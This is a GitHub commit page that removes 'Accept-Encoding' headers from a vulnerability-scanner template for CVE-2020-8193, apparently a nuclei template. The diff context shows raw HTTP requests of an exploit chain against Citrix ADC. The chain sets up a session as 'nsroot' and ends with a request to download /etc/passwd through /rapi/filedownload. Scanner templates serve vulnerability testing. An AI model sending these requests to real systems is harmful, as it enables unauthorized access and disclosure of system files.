Skip to content

Commit 0088f2e

Browse files
committed
encoding update
1 parent fdf5ac4 commit 0088f2e

File tree

1 file changed

+0
-5
lines changed

1 file changed

+0
-5
lines changed

cves/CVE-2020-8193.yaml

Lines changed: 0 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -23,31 +23,27 @@ requests:
2323
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
2424
Host: {{Hostname}}
2525
User-Agent: python-requests/2.24.0
26-
Accept-Encoding: gzip, deflate
2726
Accept: */*
2827
Connection: close
2928
3029
- |
3130
GET /menu/neo HTTP/1.1
3231
Host: {{Hostname}}
3332
User-Agent: python-requests/2.24.0
34-
Accept-Encoding: gzip, deflate
3533
Accept: */*
3634
Connection: close
3735
3836
- |
3937
GET /menu/stc HTTP/1.1
4038
Host: {{Hostname}}
4139
User-Agent: python-requests/2.24.0
42-
Accept-Encoding: gzip, deflate
4340
Accept: */*
4441
Connection: close
4542
4643
- |
4744
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
4845
Host: {{Hostname}}
4946
User-Agent: python-requests/2.24.0
50-
Accept-Encoding: gzip, deflate
5147
Accept: */*
5248
Connection: close
5349
Content-Type: application/xml
@@ -61,7 +57,6 @@ requests:
6157
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
6258
Host: {{Hostname}}
6359
User-Agent: python-requests/2.24.0
64-
Accept-Encoding: gzip, deflate
6560
Accept: */*
6661
Connection: close
6762
Content-Type: application/xml

0 commit comments

Comments
 (0)